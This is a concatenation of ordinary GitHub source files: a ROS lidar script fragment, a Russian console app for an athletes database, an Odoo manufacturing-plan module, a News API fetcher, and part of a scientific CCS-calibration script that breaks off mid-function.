#if not math.isnan(max(msg.ranges)) and not math.isinf(max(msg.ranges)):
#we can use isnan and isinf to check the data if needed
data.scan_max = np.float64(max(msg.ranges))
#if not math.isnan(min(msg.ranges)) and not math.isinf(min(msg.ranges)):
data.scan_min = np.float64(min(msg.ranges))
# publish all
closest_pub.publish(data.scan_min)
farthest_pub.publish(data.scan_max)
scan.publish(data)
rospy.Subscriber("scan", LaserScan, callback)
rospy.spin()
if __name__ == "__main__":
lidar_processing()
|
yuwei-wu/F110-autonomous-racing
|
yuweiwu_roslab/scripts/lidar_processing.py
|
lidar_processing.py
|
py
| 1,597 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26257817866
|
# Imports
import users
import find_athlete
import sys
import sqlalchemy as sa
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
import uuid
import datetime
# Global variables
task = """ Задание №1:
Напишите модуль users.py, который регистрирует новых пользователей. Скрипт должен запрашивать следующие данные:
* имя
* фамилию
* пол
* адрес электронной почты
* дату рождения
* рост
------------------
Задание 2
Напишите модуль find_athlete.py поиска ближайшего к пользователю атлета. Логика работы модуля такова:
* запросить идентификатор пользователя;
* если пользователь с таким идентификатором существует в таблице user,
то вывести на экран двух атлетов: ближайшего по дате рождения к данному пользователю
и ближайшего по росту к данному пользователю;
* если пользователя с таким идентификатором нет, вывести соответствующее сообщение.
"""
DB_PATH = "sqlite:///sochi_athletes.sqlite3"
Base = declarative_base()
# Class definitions
class bcolors:
HEADER = '\033[96m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Function definitions
def connect_db():
# create connection
engine = sa.create_engine(DB_PATH)
# create tables
Base.metadata.create_all(engine)
    # create session factory
session = sessionmaker(engine)
# Return session
return session()
def choose_mode():
print(bcolors.HEADER + "\n---------------------------------------------")
print(" Модуль B4, домашнее задание: \n")
print(bcolors.BOLD + " [1] Добавить пользователя в базу /задание №1/")
print(bcolors.BOLD +
" [2] Похожие на пользователя атлеты /задание №2/\n " + bcolors.ENDC)
print(bcolors.HEADER + " [3] Найти пользователя по ID")
print(" [4] Найти атлета похожего по возрасту на пользователя")
print(" [5] Найти атлета похожего по росту на пользователя\n ")
print(" [6] Вывести условия задачи\n ")
print(" [7] Выход\n")
print("---------------------------------------------" + bcolors.ENDC)
while True:
mode = input("\nВыберите, пожалуйста, пункт меню: ")
try:
mode = int(mode)
except ValueError:
print(bcolors.FAIL + "ERROR: Необходимо ввести номер пункта" + bcolors.ENDC)
continue
if 1 <= mode <= 7:
break
else:
print(bcolors.FAIL + "ERROR: Такого пункта не существует" + bcolors.ENDC)
return mode
def input_request(mode):
    """
    Ask for the input data and perform the selected action.
    """
session = connect_db()
if mode == 1:
"""
        Menu item: add a user to the database
"""
# DONE
users.add(session, bcolors())
if mode == 2:
"""
        Output for the assignment (task #2)
"""
print(bcolors.OKGREEN +
"\n Ищем атлетов - ближайших ровесников пользователя," +
"\n а также атлетов одинакового с пользователем роста.\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
            # find the athletes closest in age
ath_str = find_athlete.bday_compare(id, session)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN +
f"\n Самые близкие ровесники - атлеты: \n{ath_str}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
ath_str = find_athlete.height_compare(id, session, bcolors())
if ath_str != "":
print(bcolors.OKGREEN +
f" Атлеты с одинаковым ростом:\n" + bcolors.ENDC)
# input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN + f"{ath_str}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"ERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 3:
"""
        Menu item: find a user by ID
"""
# DONE
print(bcolors.OKGREEN + "\n Ищем пользователя по ID:\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"\nERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 4:
"""
        Find an athlete matching the user's date of birth
"""
print(bcolors.OKGREEN +
"\n Ищем атлета по параметрам даты рождения пользователя:\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
            # find matching athletes:
ath = find_athlete.bday_compare(id, session)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN +
f"\n Самые близкие ровесники: \n{ath}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"\nERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 5:
"""
        Find an athlete matching the user's height
"""
print(bcolors.OKGREEN +
"\n Ищем атлета по параметрам пользователя:\n" + bcolors.ENDC)
id = id_ask()
res = users.find_id(id, session)
if res:
print(bcolors.OKGREEN +
f"\n Найден пользователь: {res}" + bcolors.ENDC)
            # find a matching athlete:
ath = find_athlete.height_compare(id, session, bcolors())
if ath != "":
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
print(bcolors.OKGREEN + f"{ath}" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
else:
print(bcolors.FAIL +
f"\nERROR: Пользователь с ID:{id} не найден" + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 6:
print(bcolors.OKBLUE + "\n" + task + bcolors.ENDC)
input(bcolors.WARNING + "\n [Enter]\n" + bcolors.ENDC)
if mode == 7:
print(bcolors.WARNING + bcolors.BOLD +
"\nХорошего дня!\n" + bcolors.ENDC)
sys.exit(0)
return 0
def id_ask():
"""
    Validate the entered user ID.
"""
while True:
id_raw = input("Введите ID пользователя: ")
try:
answer = int(id_raw)
except ValueError:
print(bcolors.FAIL + "ERROR: Необходимо ввести номер ID\n" + bcolors.ENDC)
continue
if answer > 0:
break
else:
print(bcolors.FAIL + "ERROR: Такого ID не существует\n" + bcolors.ENDC)
return answer
def main():
"""
Launcher.
"""
while True:
input_request(choose_mode())
if __name__ == "__main__":
main()
# DEBUG
|
vsixtynine/sf-sql-task
|
start.py
|
start.py
|
py
| 9,483 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
29643349641
|
# -*- coding: utf-8 -*-
# (c) 2015 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import models, fields, api, _
class MrpProduction(models.Model):
_inherit = 'mrp.production'
plan = fields.Many2one('procurement.plan', string='Plan')
@api.multi
def action_confirm(self):
proc_obj = self.env['procurement.order']
res = super(MrpProduction, self).action_confirm()
for production in self:
if (production.project_id and production.plan and not
production.sale_id):
old_project = production.plan.project_id
if old_project.id != production.project_id.id:
production.plan.project_id = production.project_id.id
old_project.unlink()
cond = [('production_id', '=', production.id)]
proc = proc_obj.search(cond, limit=1)
if proc:
self._treat_procurements_reservations(proc)
return res
@api.multi
def _treat_procurements_reservations(self, proc):
self.ensure_one()
reservation_obj = self.env['stock.reservation']
proc_obj = self.env['procurement.order']
level = 1
if proc.level:
level = proc.level + 1
cond = [('parent_procurement_id', 'child_of', proc.id),
('id', '!=', proc.id),
('level', '=', level)]
procs = proc_obj.search(cond)
if procs:
for proc in procs:
cond = [('procurement_from_plan', '=', proc.id)]
reservation = reservation_obj.search(cond, limit=1)
reservation.release()
@api.multi
def button_create_plan(self):
plan_obj = self.env['procurement.plan']
proc_obj = self.env['procurement.order']
project_obj = self.env['project.project']
warehouse_obj = self.env['stock.warehouse']
for production in self:
project_vals = {
'name': _('Generated from MO: ') + production.name}
project = project_obj.create(project_vals)
proc_vals = {
'name': _('Generated from MO: ') + production.name,
'product_id': production.product_id.id,
'location_id': production.location_src_id.id,
'product_qty': production.product_qty,
'product_uom': production.product_uom.id}
proc = proc_obj.create(proc_vals)
date_planned = fields.Datetime.from_string(
production.date_planned).date()
warehouse = warehouse_obj.search([], limit=1)
plan_vals = {
'name': _('Generated from MO: ') + production.name,
'warehouse_id': warehouse.id,
'from_date': date_planned,
'to_date': date_planned,
'project_id': project.id,
'procurement_ids': [(4, proc.id)]}
plan = plan_obj.create(plan_vals)
production.plan = plan
proc._create_procurement_lower_levels(plan.id)
for procurement in plan.procurement_ids:
if procurement.show_button_create:
procurement.button_create_lower_levels()
|
odoomrp/odoomrp-wip
|
procurement_plan_mrp/models/mrp_production.py
|
mrp_production.py
|
py
| 3,308 |
python
|
en
|
code
| 119 |
github-code
|
6
|
24442654174
|
import argparse
import logging
import sys
import pandas as pd
import requests
key = ' '
def get_recent_headlines(key: str):
r = requests.get(url=f'https://newsapi.org/v2/top-headlines?country=us&apiKey={key}')
return r.json()
def get_headlines_to_certain_category(key: str, category: str):
r = requests.get(url=f'https://newsapi.org/v2/top-headlines?country=us&category={category}&apiKey={key}')
return r.json()
def json_to_dataframe(json):
return pd.DataFrame.from_dict(pd.json_normalize(json), orient='columns')
def get_news():
parser = argparse.ArgumentParser()
logging.basicConfig(level=logging.INFO)
parser.add_argument('--key', type=str, required=True, help='News API key, necessary to access the API')
parser.add_argument('--category', type=str, required=False, help='Category of news')
args = parser.parse_args()
# not null check
recent_news = get_recent_headlines(key=args.key)
logging.info('Request status: {}'.format(recent_news['status']))
logging.info(f'Fetched {recent_news["totalResults"]} new entries')
# drop rows with null values
recent_news = json_to_dataframe(recent_news['articles'])
recent_news = recent_news.dropna()
recent_news = recent_news.drop(columns=['urlToImage', 'publishedAt', 'source.id'])
if args.category is not None:
category_news = get_headlines_to_certain_category(key=args.key, category=args.category)
category_news = json_to_dataframe(category_news['articles'])
category_news = category_news.dropna()
category_news = category_news.drop(columns=['urlToImage', 'publishedAt', 'source.id'])
return recent_news, category_news
return recent_news
if __name__ == "__main__":
sys.exit(get_news())
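# Example invocation (editor's note; the key value is a placeholder, not a real key):
#   python news_api.py --key YOUR_NEWSAPI_KEY --category technology
# With --category the function returns (recent_news, category_news); without it,
# only the general top-headlines DataFrame is returned.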
|
novatc/sent-news
|
news_api.py
|
news_api.py
|
py
| 1,768 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72044818108
|
# RENAMING A FILE/FOLDER
import os  # the snippet below uses os.rename, but the original file never imported os
# syntax:
# os.rename("path_of_file_with_oldname","path_of_file_with_newname")
os.rename("/home/hidayat7z/first.txt","/home/hidayat7z/phaast.txt")
# RENAMING MULTIPLE FILES
##for 2nd Sem_res.jpeg and 3rd Sem_res.jpeg RENAME it to 2nd Semester Result.jpeg & 3rd Semester Result.jpeg
## we need to make
# Sem_res.jpeg -> Semester Result.jpeg
##that means we need to make
# /home/hidayat7z/2nd Sem_res.jpeg -> /home/hidayat7z/2nd Semester Result.jpeg
#creating a list of the files
re_files=["/home/hidayat7z/2nd Sem_res.jpeg","/home/hidayat7z/3rd Sem_res.jpeg"]
for i in re_files:
j=i.split(" ")#splitting across a space
new_path=j[0]+' Semester Result.jpeg' # concatenating to get the new path
os.rename(i,new_path)
|
hidayat7z/Python
|
Manipulating Files and Folders/4. Renaming a file.py
|
4. Renaming a file.py
|
py
| 760 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73694875709
|
'''compute CCS in multi-step experiments
'''
import traceback
import time
import glob
import os
from pathlib import Path
from sys import platform as sys_pf
if sys_pf == 'darwin':
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
import seaborn as sns
from utils import *
from shortest_for_ccs import get_possible_ccs_values
import argparse
##########################################################################
# ArgumentParser
##########################################################################
parser = argparse.ArgumentParser()
parser.add_argument(
'--target_list_file', type=str, default='TargetList.txt',
help='Target list file (Tab-delimited text format)')
parser.add_argument(
'--config_file', type=str, default='config.xml',
help='Configuration file')
# parser.add_argument(
# '--data_folder', type=str, default='./',
# help='Data folder containing all the cef and meta data files')
parser.add_argument(
'--feature_files', type=str,
help='feature files to calibrate CCS values')
parser.add_argument(
'--framemeta_files', type=str,
help='frame meta info file for samples')
parser.add_argument(
'--output', type=str, default='ccs_table.tsv',
help='Output file to save a output table')
parser.add_argument(
'--r2_threshold', type=float, default=0.99,
help='threshold value for r2')
parser.add_argument(
'--num_isotopes_threshold', type=int, default=1,
help='threshold value for num_isotopes')
parser.add_argument(
'--intensity_rank_threshold', type=int, default=3,
help='threshold value for peak intensity rank in m/z window')
parser.add_argument(
'--threshold_n_fields', type=int, default=3,
help='threshold value for the minimum number of fields for linear regression')
parser.add_argument(
'--maxint', action='store_true',
help='select max intensive peaks for ccs computation')
parser.add_argument(
'--format', type=str, choices=['cef','mzmine'], default='mzmine',
help='file format for the features, e.g., cef or mzmine')
parser.add_argument(
'--output_dir', type=str, default='./',
help='a directory to store output files')
FLAGS = {}
##########################################################################
def get_metadata(mfile, offset, ax=None, label=None):
'''read metadata file and extract the field information for each frame
TODO: offset method (choose one frame by offset) or average in a range
Return
a pandas dataframe having a field information for each frame
'''
try:
metadata = pd.read_csv(mfile, sep='\t')
_list = list(metadata.drop_duplicates(subset='FrameMethodId').FrameId+offset-1)
filtered = metadata[metadata.FrameId.isin(_list)]
##################################################
if ax is not None:
ax[0].plot(metadata.FrameId, metadata.ImsTemperature, label=label)
ax[0].scatter(filtered.FrameId, filtered.ImsTemperature, label=None)
ax[0].set_ylabel('Temperature (C)')
ax[1].plot(metadata.FrameId, metadata.ImsPressure)
ax[1].scatter(filtered.FrameId, filtered.ImsPressure)
ax[1].set_ylabel('Pressure (torr)')
ax[2].plot(metadata.FrameId, metadata.ImsField)
ax[2].scatter(filtered.FrameId, filtered.ImsField)
ax[2].set_ylabel('E (V/cm)')
ax[2].set_xlabel('Frame ID')
##################################################
return filtered
except Exception as e:
return None
def get_target_info(target_list_file):
'''read the target_list_file
target_list_file: file path for a config file
Return
a pandas dataframe containing target information
'''
return pd.read_csv(target_list_file, sep='\t').fillna(method='ffill')
def get_adducts(exact_mass, adducts):
'''get the adducts mass
exact_mass: exact mass of the target
adducts: configuration for adducts in config_file
Return
adducts2mass: a dict containing information of positive and negative adducts
'''
adducts2mass = {'pos':{}, 'neg':{}}
for adduct in adducts:
charges = adduct['charges'].replace(' ','').split(',')
for c in charges:
charge = int(c)
name = '[M'+c+adduct['name']+']' if abs(charge)>1 else '[M'+c[0]+adduct['name']+']'
mass = (exact_mass + charge * adduct['mass'])/abs(charge)
if charge > 0:
adducts2mass['pos'][name] = (mass, charge)
elif charge < 0:
adducts2mass['neg'][name] = (mass, charge)
return adducts2mass
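# --- editor's note (hedged worked example) ---
# With the formula above, and assuming the config lists a proton adduct of mass
# ~1.00728 Da, a neutral exact mass of 180.0634 (e.g. a hexose) would give
#   [M+H]+   -> (180.0634 + 1*1.00728)/1 = 181.0707
#   [M+2H]2+ -> (180.0634 + 2*1.00728)/2 =  91.0390
# i.e. multiply-charged adducts are reported as m/z, not as neutral mass.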
def get_features(file, max_normalize=True, fformat='cef'):
if fformat=='cef': return get_features_from_cef(file, max_normalize)
elif fformat=='mzmine': return get_features_from_mzmine_csv(file, max_normalize)
else: print('File format: {0}. This tool doesn\'t support this file format.'.format(fformat))
return None, None
def get_adducts_colors(adduct):
colors = {'[M+.]':'m',
'[M+H]':'b',
'[M+2H]':'c',
'[M+Na]':'r',
'[M+K]':'g',
'[M-H]':'y'}
if adduct in colors:
return colors[adduct]
else:
return 'k'
def is_in_tolerance(x, mass, ppm):
delta = mass * ppm * 1.0e-6
#print(mass, delta, mass-delta, mass+delta)
return (x >= mass - delta) & (x <= mass + delta)
def mass_error(x, mass):
return abs(x - mass) / mass * 1e6
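# --- editor's note (hedged worked example) ---
# is_in_tolerance uses a symmetric ppm window: for mass = 500.0 and ppm = 20 the
# allowed window is 500.0 +/- 500.0*20e-6 = 500.0 +/- 0.01, i.e. [499.99, 500.01];
# mass_error(500.005, 500.0) correspondingly reports 10 ppm.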
def find_features_maxint(features, metadata, ion_mz, z, ppm):
df = features[is_in_tolerance(features.mz, ion_mz, ppm) & (features.z==z)]
if df.shape[0] == 0: return df
# if 'frame' column in metadata, delete it
if 'frame' in metadata.columns: del metadata['frame']
df = df.sort_values(by='intensity_z').drop_duplicates(subset='frame', keep='last')
df = df.merge(metadata, left_on='frame', right_on='FrameMethodId', how='inner')
df = df.sort_values(by='frame')
return df
def find_features(features, metadata, ion_mz, z, ppm,
threshold_num_isotopes=2,
threshold_intensity_rank=3):
if 'num_isotopes' in features.columns:
df = features[is_in_tolerance(features.mz, ion_mz, ppm) & \
(features.z==z) & \
(features.num_isotopes>=threshold_num_isotopes)]
else:
df = features[is_in_tolerance(features.mz, ion_mz, ppm) & (features.z==z)]
if df.shape[0] == 0: return df
# filter out small peaks by ranking threshold
rankings = df.groupby('frame')['intensity_org'].rank(ascending=False)
df = df[rankings<=threshold_intensity_rank]
# for f in frames_too_many_features:
# filter_by_intensity_rank(df, f, threshold_intensity_rank)
# if 'frame' column in metadata, delete it
if 'frame' in metadata.columns: del metadata['frame']
# df = df.sort_values(by='intensity_z').drop_duplicates(subset='frame', keep='last')
df = df.merge(metadata, left_on='frame', right_on='FrameMethodId', how='inner')
# df = df.sort_values(by='frame')
# df.to_csv("test_{0:.5f}.txt".format(ion_mz),sep="\t")
return df
def filter_by_intensity_rank(df, frame, threshold_intensity_rank=3):
temp = df[df.frame == frame]
# print(df)
# print(frame, temp.intensity_org)
np.argsort(temp.intensity_org)
def ccs_filter(ccs_list):
# remove the redundant regression lines which share the same start nodes(features)
first_peaks = []
last_peaks = []
for ccs in ccs_list:
first_peaks.append(int(ccs.mppid[0]))
last_peaks.append(int(ccs.mppid[-1]))
ufirst_peaks = list(np.unique(first_peaks))
ulast_peaks = list(np.unique(last_peaks))
if len(ufirst_peaks) < len(ccs_list):
print("len(ufirst_peaks) < len(ccs_list)", len(ufirst_peaks),len(ccs_list))
_ccs_list = []
for u in ufirst_peaks:
idx_list = np.where(first_peaks == u)[0]
if idx_list.shape[0] > 1:
best_r2 = 0
best_ccs_u = None
for ii in idx_list:
if (best_r2 < ccs_list[ii].r2):
best_ccs_u = ccs_list[ii]
best_r2 = ccs_list[ii].r2
if best_ccs_u != None:
_ccs_list.append(best_ccs_u)
else:
_ccs_list.append(ccs_list[idx_list[0]])
return _ccs_list
elif len(ulast_peaks) < len(ccs_list):
print("len(ulast_peaks) < len(ccs_list)", len(ulast_peaks),len(ccs_list))
print("ulast_peaks", ulast_peaks)
print("last_peaks", last_peaks)
_ccs_list = []
for u in ulast_peaks:
idx_list = np.where(last_peaks == u)[0]
print('idx_list',u, idx_list)
if idx_list.shape[0] > 1:
best_r2 = 0
best_ccs_u = None
for ii in idx_list:
if (best_r2 < ccs_list[ii].r2):
best_ccs_u = ccs_list[ii]
best_r2 = ccs_list[ii].r2
if best_ccs_u != None:
_ccs_list.append(best_ccs_u)
else:
_ccs_list.append(ccs_list[idx_list[0]])
return _ccs_list
else:
return ccs_list
# find the CCS values of the earliest molecules
pass
def files_not_enough(fname, config_params, fformat='cef'):
# meta_file = (fname + '{0}.txt').format(config_params['suffix_meta'])
# if not os.path.isfile(meta_file):
# print("[ERROR] a metadata file doesn't exist:", meta_file)
# return True
for step in range(config_params['num_fields']):
if fformat=='cef': ffile = (fname + '{0}.cef').format(config_params['suffix_raw'].format(step+1))
else: ffile = (fname + '{0}.csv').format(config_params['suffix_raw'].format(step+1))
if not os.path.isfile(ffile):
print("[ERROR] a feature file doesn't exist:", ffile)
return True
return False
def get_ccs(FLAGS, comp_id, target_list, config_params):
'''
Return
a list
'''
ccs_results = []
# time_for_feature_finding = 0
# find the target files by the unique id for a compound
target_info = target_list[target_list.ID==comp_id]
if target_info.shape[0]==0: return ccs_results
# get file names for multiple runs
rep_files = target_info.RawFileName.tolist()
rep_files.sort()
num_reps = len(rep_files)
# get the unique information for each target
unique_target_info = target_info.drop(['RawFileName', 'FrameMetaName'], axis=1).drop_duplicates()
if unique_target_info.shape[0] > 1:
print("[ERROR] There are more than one targets for this comp_id. comp_id:{}, and unique_target_info:".format(comp_id))
print(unique_target_info)
compound_id = unique_target_info.iloc[0].CompoundID
exact_mass = unique_target_info.iloc[0].ExactMass
ionization = unique_target_info.iloc[0].Ionization
neutral_name = unique_target_info.iloc[0].CompoundName
print(compound_id, neutral_name, ionization, exact_mass)
# get adducts
adducts = get_adducts(target_info.ExactMass.tolist()[0], config_params['adducts'])[target_info.Ionization.tolist()[0]]
# get file informations
tdf = target_info[['RawFileName', 'FrameMetaName']].dropna()
if tdf.shape[0] == 0:
print("[ERROR] cannot find any metadata files for", comp_id)
return ccs_results
rawFile2Framemeta = pd.Series(tdf.FrameMetaName.values, index=tdf.RawFileName).to_dict()
print(rawFile2Framemeta)
##################################################
plt.close('all')
figs = {}
is_filled = {}
axis = {}
for adduct in adducts:
figs[adduct], axis[adduct] = plt.subplots(num_reps, sharex=True, sharey=True, figsize=(8,3*num_reps))
is_filled[adduct] = False
figs['meta'], axis['meta'] = plt.subplots(3, sharex=True, sharey=False, figsize=(8,8))
figs['intdist'], axis['intdist'] = plt.subplots(config_params['num_fields'], num_reps, sharex=True, sharey=False, figsize=(6*num_reps, 2*config_params['num_fields']))
##################################################
# compute CCS for each replicate
try:
for r, rep_file in enumerate(rep_files):
if files_not_enough(rep_file, config_params, FLAGS.format):
ccs_prop = dict()
tokens = comp_id.rsplit('_', 1)
ccs_prop['Compound_id'] = compound_id
ccs_prop['Ionization'] = ionization
ccs_prop['replicate'] = rep_file
ccs_prop['name'] = neutral_name
# ccs_prop['CAS'] = list(target_info.CAS)[0]
ccs_prop['comments'] = "couldn't find some files to compute CCS"
ccs_results.append(ccs_prop)
continue
# meta_file = (fname + '{0}.txt').format(config_params['suffix_meta'])
meta_file = rawFile2Framemeta[rep_file]
metadata = get_metadata(meta_file, config_params['frame_offset'], ax=axis['meta'], label=rep_file.split('/')[-1])
# collecting features
features = []
for step in range(config_params['num_fields']):
if FLAGS.format=='cef': ffile = (rep_file + '{0}.cef').format(config_params['suffix_raw'].format(step+1))
else: ffile = (rep_file + '{0}.csv').format(config_params['suffix_raw'].format(step+1))
_features, _ = get_features(ffile, fformat=FLAGS.format)
if _features.shape[0] > 0:
_features['frame'] = np.ones(_features.shape[0], dtype=np.int32) * (step+1)
features.append(_features)
## draw m/z vs intensity
if num_reps == 1:
ax = axis['intdist'][step]
else:
ax = axis['intdist'][step, r]
plot_intensity_distribution(_features, adducts, ax, config_params['mz_tolerance'])
else:
print("[ERROR] This file has no features: {0}".format(ffile))
if len(features) == 0: continue
features = pd.concat(features)
# compute CCS for each adducts
print("#"*150)
print("# features")
print("#"*150)
print(features)
print("features size:", features.shape)
for adduct in adducts:
adduct_mass, charge_state = adducts[adduct]
start_time = time.time()
if (FLAGS.maxint):
ccs_features_within_mz = find_features_maxint(features, metadata, adduct_mass, abs(charge_state), config_params['mz_tolerance'])
else:
ccs_features_within_mz = find_features(features, metadata, adduct_mass, abs(charge_state), config_params['mz_tolerance'],
threshold_num_isotopes=FLAGS.num_isotopes_threshold,
threshold_intensity_rank=FLAGS.intensity_rank_threshold)
if ccs_features_within_mz.shape[0] > 0:
print("#"*150)
print("# ccs_features_within_mz")
print("#"*150)
print(ccs_features_within_mz)
print("ccs_features_within_mz size:", ccs_features_within_mz.shape)
ccs_list = get_possible_ccs_values(ccs_features_within_mz,
adduct_mass,
abs(charge_state),
old_drift_tube_length=config_params['old_drift_tube_length'],
drift_tube_length=config_params['drift_tube_length'],
neutral_mass=config_params['neutral_mass'],
threshold_n_fields=FLAGS.threshold_n_fields,
threshold_r2=FLAGS.r2_threshold)
# filtering should be done based on CCS values across all 3 replicates
# Note: I am not sure if r2 is a good metric to do this.
ccs_list = ccs_filter(ccs_list)
if len(ccs_list) > 0:
tokens = comp_id.rsplit('_', 1)
for ccs in ccs_list:
ccs_prop = ccs.to_dict()
print("[{0}] {1} ({2}), CCS: {3}({4})".format(comp_id, adduct, rep_file, ccs_prop['ccs'], ccs_prop['r2']))
ccs_prop['Compound_id'] = compound_id
ccs_prop['Ionization'] = ionization
ccs_prop['adduct'] = adduct
ccs_prop['replicate'] = rep_file
ccs_prop['name'] = neutral_name
ccs_results.append(ccs_prop)
if num_reps == 1:
_tmp_ax = axis[adduct]
else:
_tmp_ax = axis[adduct][r]
##################################################
plot_ccs_regression_lines2(
_tmp_ax,
adduct,
adduct_mass,
ccs_features_within_mz,
ccs_list,
title=Path(rep_file).name,
drift_tube_length=config_params['drift_tube_length'])
is_filled[adduct] = True
##################################################
##################################################
for adduct in adducts:
if is_filled[adduct]:
figs[adduct].tight_layout()
figs[adduct].savefig(FLAGS.output_dir+"/"+comp_id+"_"+adduct+".pdf", dpi=300)
axis['meta'][0].legend()
figs['meta'].tight_layout()
figs['meta'].savefig(FLAGS.output_dir+"/"+comp_id+"_meta.pdf", dpi=300)
figs['intdist'].tight_layout()
figs['intdist'].savefig(FLAGS.output_dir+"/"+comp_id+'_intensity_dist.pdf')
##################################################
except Exception as e:
traceback.print_exc()
if hasattr(e, 'strerror'):
print ("[ERROR]: {0} ({1})".format(e.strerror, rep_file))
else:
print ("[ERROR]: ", e)
# print('Total time for feature finding: {0} sec/compound(e.g., 3 reps and 6 adducts)'.format(time_for_feature_finding))
return ccs_results
def compute(df, ion_mz, config_params):
'''compute ccs
'''
params = {}
params['temp'] = df.ImsTemperature.tolist()
params['pressures'] = df.ImsPressure.tolist()
params['voltages'] = (df.ImsField*config_params['old_drift_tube_length']).tolist() ## 10.869 * (78.12 / 78.236) = 10.853 for correction
params['arrival_time'] = df.dt.tolist()
params['neutral_mass'] = config_params['neutral_mass']
params['drift_tube_length'] = config_params['drift_tube_length']
params['mz'] = ion_mz
# print(params)
ccs, prop = SteppedFieldCCS(params=params).compute()
# print("CCS:", ccs)
return prop
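# Hedged sketch (illustrative only; the real calculation lives in SteppedFieldCCS, whose internals
# are not shown here). Stepped-field DTIMS reduces to a linear fit of arrival time against
# pressure/voltage: the slope carries the mobility information and the intercept absorbs the time
# spent outside the drift region. The argument names are assumptions, not the library's API.
def _sketch_stepped_field_fit(arrival_time_ms, pressures_torr, fields_v_per_cm, tube_length_cm):
    p_over_v = np.asarray(pressures_torr) / (np.asarray(fields_v_per_cm) * tube_length_cm)
    slope, intercept = np.polyfit(p_over_v, np.asarray(arrival_time_ms), 1)
    return slope, intercept   # slope ~ mobility term, intercept ~ non-drift dead time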
def plot_ccs_regression_lines(axis, adduct, adduct_mass, df, prop, title, drift_tube_length=78.236):
addmass = adduct_mass
color = get_adducts_colors(adduct)
p_v = df.ImsPressure / (df.ImsField * drift_tube_length)
p_vmax = p_v.max()
p_vmin = p_v.min()
axis.scatter(p_v, df.dt, c=color)
axis.text(0.05, 0.8, '{0} {1:.6f}'.format(adduct, addmass),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=15)
for r in df.itertuples():
axis.text((r.ImsPressure / (r.ImsField * drift_tube_length) + (p_vmax - p_vmin)/7), r.dt,
# '{0:.3f}ppm, {1:.2f}(z_score={2:.3f})'.format(mass_error(r.mass, addmass), r.intensity, r.intensity_z),
'{0:.3f}ppm, z_score={1:.2f}'.format(mass_error(r.mz, addmass), r.intensity_z),
color='k', fontsize=10)
axis.plot(p_v, 1000 * (prop['intercept'] + prop['slope']*p_v), 'r', label='fitted line')
axis.text(0.05, 0.65, 'r-squared:{0:.5f}'.format(prop['r_value']**2),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=15)
axis.text(0.05, 0.5, 'CCS:{0:.4f}'.format(prop['ccs']),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=15)
axis.set_title(title)
axis.set_xlabel('Pressure/Voltages (Torr/V)')
axis.set_ylabel('Arrival time (ms)')
# def plot_ccs_regression_lines2(axis, adduct, adduct_mass, df, prop, title, drift_tube_length=78.236):
def plot_ccs_regression_lines2(
axis,
adduct,
adduct_mass,
df,
ccs_list,
title,
drift_tube_length):
addmass = adduct_mass
color = get_adducts_colors(adduct)
p_v = df.ImsPressure / (df.ImsField * drift_tube_length)
p_vmax = p_v.max()
p_vmin = p_v.min()
pv_width = p_vmax - p_vmin
for r in df.itertuples():
axis.scatter(r.ImsPressure / (r.ImsField * drift_tube_length), r.dt,
c=color, s=1000*r.intensity, alpha=0.2)
axis.text(0.05, 0.8, '{0} {1:.5f}'.format(adduct, addmass),
verticalalignment='bottom', horizontalalignment='left',
transform=axis.transAxes,
color='k', fontsize=10)
for ccs in ccs_list:
prop = ccs.to_dict()
pv = [ccs.pressures[i] / (ccs.fields[i] * drift_tube_length) for i in range(len(ccs.pressures))]
dt_diff = [abs(ccs.arrival_time[i-1]-ccs.arrival_time[i]) for i in range(1,len(ccs.arrival_time))]
for i, f in enumerate(ccs.fields):
axis.text((pv[i] + (p_vmax - p_vmin)/7), ccs.arrival_time[i],
